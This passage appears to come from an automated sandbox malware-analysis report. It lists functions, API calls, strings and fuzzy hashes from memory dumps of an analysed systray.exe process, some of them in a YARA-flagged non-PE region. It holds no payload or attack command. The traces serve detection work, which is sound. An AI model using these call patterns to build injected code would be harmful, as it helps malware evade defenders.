Instruction Fuzzy Hash: 2E90027120100C42D14161D94804B460005A7E1341F51C116A1118768DC695C9557561

Uniqueness

Uniqueness Score: -1.00%

Function 017F9670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 5cdb17cc779140ae7e0192c9878fae53c3bdc3ad0732124b1fec5f231db976cc
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0184FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0184FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E017FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01845720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01845720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0184fdda
0x0184fde2
0x0184fde5
0x0184fdec
0x0184fdfa
0x0184fdff
0x0184fe0a
0x0184fe0f
0x0184fe17
0x0184fe1e
0x0184fe19
0x0184fe19
0x0184fe19
0x0184fe20
0x0184fe21
0x0184fe22
0x0184fe25
0x0184fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0184FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0184FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0184FE01

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: a980c72ddede3f83bc99f85ece16d71c3fee65704592ae28411907e4cf7f4e94
Instruction ID: 361380d4daae757f5f13a934d12f33ac62f3ea2cafcd5c4eac87f473b339d7b1
Opcode Fuzzy Hash: a980c72ddede3f83bc99f85ece16d71c3fee65704592ae28411907e4cf7f4e94
Instruction Fuzzy Hash: E1F0F672240205BFE6201A49DC06F23BF5AEB84B30F140318F7289A5E1EE62F92086F1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: systray.exe PID: 2108 Parent PID: 3424 systray.exeCOMMON

Executed Functions

Function 02CD81B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02CD3B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02CD3B87,007A002E,00000000,00000060,00000000,00000000), ref: 02CD81FD

Strings

.z`, xrefs: 02CD81ED, 02CD81F8

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: d980a7bbaa09477f7f79115161a49cc4fc774bc668d88bf8e5d3c7babfeaf98c
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: BFF0B2B2200208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630F8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02CD81AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02CD3B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02CD3B87,007A002E,00000000,00000060,00000000,00000000), ref: 02CD81FD

Strings

.z`, xrefs: 02CD81ED, 02CD81F8

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: cb2f07bbc838fb6c36a7f6924397f3b70995901d3015c204cbd7a78785e85a2d
Instruction ID: 4a8f844e0a1e2cd96caab3fe1fb703746cd463ae0b0373bb18915bc9501e1aa3
Opcode Fuzzy Hash: cb2f07bbc838fb6c36a7f6924397f3b70995901d3015c204cbd7a78785e85a2d
Instruction Fuzzy Hash: B6F0CFB2214149ABCB08CF98D884CEB77A9FF8C754B15864DFA1DA3202D634E8558BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02CD825A, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02CD3D42,5E972F59,FFFFFFFF,02CD3A01,?,?,02CD3D42,?,02CD3A01,FFFFFFFF,5E972F59,02CD3D42,?,00000000), ref: 02CD82A5

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: bbb951c9e17c43aa3d8db519a6691c5dc01069bcba90a1153b14edfd27066279
Instruction ID: 71d0bc3bef23d4b36ce619119921122d8ee90aced69a378cc0a22c2a6e919462
Opcode Fuzzy Hash: bbb951c9e17c43aa3d8db519a6691c5dc01069bcba90a1153b14edfd27066279
Instruction Fuzzy Hash: 55F0B7B6200105AFCB14DF99DC90EEB77A9EF8C714F158649BA1DA7241DA30E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02CD8260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02CD3D42,5E972F59,FFFFFFFF,02CD3A01,?,?,02CD3D42,?,02CD3A01,FFFFFFFF,5E972F59,02CD3D42,?,00000000), ref: 02CD82A5

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 5d2f7a5080f815baed305b6963e18c7edc84b6401cfcd292b2b019c84ee844e4
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 6DF0A4B2200208ABCB14DF89DC80EEB77ADAF8C754F158248BA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02CD8390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02CC2D11,00002000,00003000,00000004), ref: 02CD83C9

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 283d52849d1ca7047b3909550dec47c8b5b9adb61491d53b7ecd7f81f31dde4f
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: CFF015B2200208ABCB14DF89CC80EEB77ADAF88750F118248BE0897241C630F811CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02CD82E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02CD3D20,?,?,02CD3D20,00000000,FFFFFFFF), ref: 02CD8305

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: eb36f19719f65910efeb56e26276eb1035409a0fb9b3037771891b8009ae5e32
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 44D012752002146BD710EF98CC45EE7776DEF44750F154555BA185B241C530F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 02CD82E2, Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02CD3D20,?,?,02CD3D20,00000000,FFFFFFFF), ref: 02CD8305

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 02f09d60961d913d46fe804f44ce9272827ead6f5594cb76db36b0cccc53dc0a
Instruction ID: a995bc1082efd5a399d84a88f669f1572868b6cfa0531cef0f4454b52c17a24c
Opcode Fuzzy Hash: 02f09d60961d913d46fe804f44ce9272827ead6f5594cb76db36b0cccc53dc0a
Instruction Fuzzy Hash: B3D01776200210ABDB10EFA8CC84EE77B69EF48760F154599BA1C9B281C530EA018AE0

Uniqueness

Uniqueness Score: -1.00%

Function 045B9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045B954A

Memory Dump Source

Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true

Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c0f34281e1bb709f2667ca10b7e403f72bb3c151e568576a0bf2c49c76a93216
Instruction ID: 81e84a742d749fa25196d8af3621902e1eb083b777b068a27db05d31e77f6fb1
Opcode Fuzzy Hash: c0f34281e1bb709f2667ca10b7e403f72bb3c151e568576a0bf2c49c76a93216
Instruction Fuzzy Hash: 73900265251000072205A59907045070096A7D5395351C035F100A590CD661D8657161

Uniqueness

Uniqueness Score: -1.00%

Function 045B95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045B95DA

Memory Dump Source

Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true

Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7925f22987c59b79f5beb83b845af354a370f01dd628ae616c4afcdcb127bc79
Instruction ID: 002ffdd6380582a711f861f84afcdad7b38acb15848af019b56e187221d99d2d
Opcode Fuzzy Hash: 7925f22987c59b79f5beb83b845af354a370f01dd628ae616c4afcdcb127bc79
Instruction Fuzzy Hash: 939002A124200007620571994414616405AA7E0245B51C035E10095D0DC565D8957165

Uniqueness

Uniqueness Score: -1.00%

Function 045B9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045B965A

Memory Dump Source

Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true

Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 22a423d31eac3375c7b666d57770036050fa42e1739d50178ecb2813bec80658
Instruction ID: 7dfeb3f8a6284a50aadc4d272b6b1d23b9b50624e87661fb89c4c8606c7b2929
Opcode Fuzzy Hash: 22a423d31eac3375c7b666d57770036050fa42e1739d50178ecb2813bec80658
Instruction Fuzzy Hash: 2E90027124504846F24071994404A460065A7D0349F51C025A00596D4D9665DD59B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 045B9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045B966A

Memory Dump Source

Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true

Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9a6f8c90799a59b660d498b3cc6e7408c45fe8ad4cd7bd88625c09d4ffed1791
Instruction ID: 5819abf1ac8acd57eb8f7acc1a17356c0d5f9e6c996837aea1a1133335603c4b
Opcode Fuzzy Hash: 9a6f8c90799a59b660d498b3cc6e7408c45fe8ad4cd7bd88625c09d4ffed1791
Instruction Fuzzy Hash: AD90027124100806F2807199440464A0055A7D1345F91C029A001A694DCA55DA5D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 045B96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045B96DA

Memory Dump Source

Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true

Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f2d1db72cddd664c6cd346c21d83f0b94f8156c90bc7f3a75f36048c7b6e92e
Instruction ID: b64bee95d55f2696326cba27156c1ee4ad748dc94ed9264661870ac033cbc19e
Opcode Fuzzy Hash: 5f2d1db72cddd664c6cd346c21d83f0b94f8156c90bc7f3a75f36048c7b6e92e
Instruction Fuzzy Hash: CA90027124100846F20061994404B460055A7E0345F51C02AA0119694D8655D8557561

Uniqueness

Uniqueness Score: -1.00%

Function 045B96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045B96EA

Memory Dump Source

Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true

Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 31718dc635ed0f4fd56509f525015eef95265a36728f9783c2e0ef4ffec781f7
Instruction ID: 1e9a834c76b2ebfe26a435a8262ca52eeca33845f086e54c72cf6263a7bf6934
Opcode Fuzzy Hash: 31718dc635ed0f4fd56509f525015eef95265a36728f9783c2e0ef4ffec781f7
Instruction Fuzzy Hash: 4B90027124108806F2106199840474A0055A7D0345F55C425A4419698D86D5D8957161

Uniqueness

Uniqueness Score: -1.00%

Function 045B9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045B971A

Memory Dump Source

Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true

Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a28d6cbb130c2d7263263b4b4c833d70551138b2a1bcf29dab0544e61ee11b5d
Instruction ID: f2e595af8c505617cc095e5d39bef766ce82896f4bba42816b9ef8489f17c0c8
Opcode Fuzzy Hash: a28d6cbb130c2d7263263b4b4c833d70551138b2a1bcf29dab0544e61ee11b5d
Instruction Fuzzy Hash: 0F90027124100406F20065D954086460055A7E0345F51D025A5019595EC6A5D8957171

Uniqueness

Uniqueness Score: -1.00%

Function 045B9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045B9FEA

Memory Dump Source

Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true

Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c0dae682607209a9f746f7445fe0e2029a13c86504d18189fe76ebd3b05dbde4
Instruction ID: ffc7f0b7979d489648709c8b0ca263e3ed57c6378cbf9e5cf10aa99de37d3349
Opcode Fuzzy Hash: c0dae682607209a9f746f7445fe0e2029a13c86504d18189fe76ebd3b05dbde4
Instruction Fuzzy Hash: 8090027135114406F210619984047060055A7D1245F51C425A0819598D86D5D8957162

Uniqueness

Uniqueness Score: -1.00%

Function 045B9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045B978A

Memory Dump Source

Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true

Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e7ef172982041b9e3ff88dc36a1b2e4686901b7ea6cc1b8da9e53bcc35456c99
Instruction ID: 5913065260bf0483a8c7d710ec953102a4446c7753b7b7f7bb2387c315dee4f5
Opcode Fuzzy Hash: e7ef172982041b9e3ff88dc36a1b2e4686901b7ea6cc1b8da9e53bcc35456c99
Instruction Fuzzy Hash: 8590026925300006F2807199540860A0055A7D1246F91D429A000A598CC955D86D7361

Uniqueness

Uniqueness Score: -1.00%

Function 045B9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045B984A

Memory Dump Source

Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true

Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7b96a5ecea05c9cf571ff62eb07d90113d8a152a26a528105d73ef352490c245
Instruction ID: d98985595fcc9854491c0d8fccc40fc2125b763bd8d301987c04a6f94cd9abe2
Opcode Fuzzy Hash: 7b96a5ecea05c9cf571ff62eb07d90113d8a152a26a528105d73ef352490c245
Instruction Fuzzy Hash: 58900261282041567645B19944045074056B7E0285791C026A1409990C8566E85AF661

Uniqueness

Uniqueness Score: -1.00%

Function 045B9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045B986A

Memory Dump Source

Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true

Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9a3b03e8c58f847957f44829c2376af9f93ca63ee2d10600c22f45964fe924d4
Instruction ID: 2072fe16823af285e3ef7bd42e6d9f3a1fb0838715714877b9e0ca1d75590af5
Opcode Fuzzy Hash: 9a3b03e8c58f847957f44829c2376af9f93ca63ee2d10600c22f45964fe924d4
Instruction Fuzzy Hash: AF90027124100417F211619945047070059A7D0285F91C426A0419598D9696D956B161

Uniqueness

Uniqueness Score: -1.00%

Function 045B9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045B991A

Memory Dump Source

Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true

Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2606b88290f6c3bf68f7e1c5391df9476dc4049e66e95261dca8ed5c918bfac2
Instruction ID: e190250303336ab40fc77e65b3c46c21f23f2255518c08b873bf9d63c2e041a2
Opcode Fuzzy Hash: 2606b88290f6c3bf68f7e1c5391df9476dc4049e66e95261dca8ed5c918bfac2
Instruction Fuzzy Hash: 569002B124100406F240719944047460055A7D0345F51C025A5059594E8699DDD976A5

Uniqueness

Uniqueness Score: -1.00%

Function 045B99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045B99AA

Memory Dump Source

Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true

Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 97cb8c9cd8fdd16761378b1738678a87fe2bdcf098f6a781356227ec2afdd2ce
Instruction ID: b7e137fafebadf97141d97b46c94e11584bdc05a9c7673211be42a788c01364c
Opcode Fuzzy Hash: 97cb8c9cd8fdd16761378b1738678a87fe2bdcf098f6a781356227ec2afdd2ce
Instruction Fuzzy Hash: 6E9002A138100446F20061994414B060055E7E1345F51C029E1059594D8659DC567166

Uniqueness

Uniqueness Score: -1.00%

Function 045B9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045B9A5A

Memory Dump Source

Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true

Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e4751826996e024dbeeccb1baa5f5b26f4aaf69e2e0896e421c1a84aa19d0b5f
Instruction ID: 48dbb6b46937930662e4834ace3086151af972d97a111027a6e5f806e0337c62
Opcode Fuzzy Hash: e4751826996e024dbeeccb1baa5f5b26f4aaf69e2e0896e421c1a84aa19d0b5f
Instruction Fuzzy Hash: 0790026125180046F30065A94C14B070055A7D0347F51C129A0149594CC955D8657561

Uniqueness

Uniqueness Score: -1.00%

Function 02CD6ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02CD6F78

Strings

wininet.dll, xrefs: 02CD6F2E, 02CD6F37
net.dll, xrefs: 02CD6F41, 02CD6FC7, 02CD6F9F, 02CD6FAB, 02CD6FD3

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: c9b3c6663157e16197c6f84555faca932412816185e5914e14cb4e0ab3cdbe2e
Instruction ID: 6f8a534de01986c0d9e940b02f82fcf457da2e2a7455fc8be48b8d336f8e21e4
Opcode Fuzzy Hash: c9b3c6663157e16197c6f84555faca932412816185e5914e14cb4e0ab3cdbe2e
Instruction Fuzzy Hash: AE317EB5601704BBC725DFA8D8A0FA7BBB9EB88700F10841DF65A9B241D731B545CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02CD6EC6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02CD6F78

Strings

wininet.dll, xrefs: 02CD6F2E, 02CD6F37
net.dll, xrefs: 02CD6F41, 02CD6F9F, 02CD6FAB

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 96e3b3f9513e456051d8a33696c94b743ed5aad4bc3e1a11ba64bc6c1ec742f9
Instruction ID: cb30565ebd87217d54b2c9735270262f16561bdbbfabfde7ae0fd8f4161bb651
Opcode Fuzzy Hash: 96e3b3f9513e456051d8a33696c94b743ed5aad4bc3e1a11ba64bc6c1ec742f9
Instruction Fuzzy Hash: 3D21A0B5601704BBD710EFA8D8A1FA7BBB9EF88704F10841DF619AB241D371E945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02CD84B2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02CC3B93), ref: 02CD84ED

Strings

.z`, xrefs: 02CD84DC, 02CD84E8

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 2761205a35dc051a859ddbd3f81c910fb9ab3040867dd034cc3d9f8bbbe7a0cf
Instruction ID: 7031146e2610a09d6007868bf811eb4283ef35db87168a9bb7d006e58d9153ee
Opcode Fuzzy Hash: 2761205a35dc051a859ddbd3f81c910fb9ab3040867dd034cc3d9f8bbbe7a0cf
Instruction Fuzzy Hash: D4F030716002046FDB24DFA5CC85EE73769EF44750F104659FA099B291C632E815CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 02CD84C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02CC3B93), ref: 02CD84ED

Strings

.z`, xrefs: 02CD84DC, 02CD84E8

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 976213b43040cf034992daa5cddd46cd284099cd726d696781062038dbc5dc5f
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 75E01AB12002046BDB14DF59CC44EA777ADAF88750F014554BA0857241C630F9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 02CC7260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02CC72BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02CC72DB

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
Instruction ID: decb32c13f08ecb553d10812e7b043196eddab4c3e7160c594de17239afbc39b
Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
Instruction Fuzzy Hash: 5B01DB31A80328B7E720A6949C02FFF776C9F40B50F140159FF04BA1C1E6A47A069BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02CC9B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02CC9B82

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
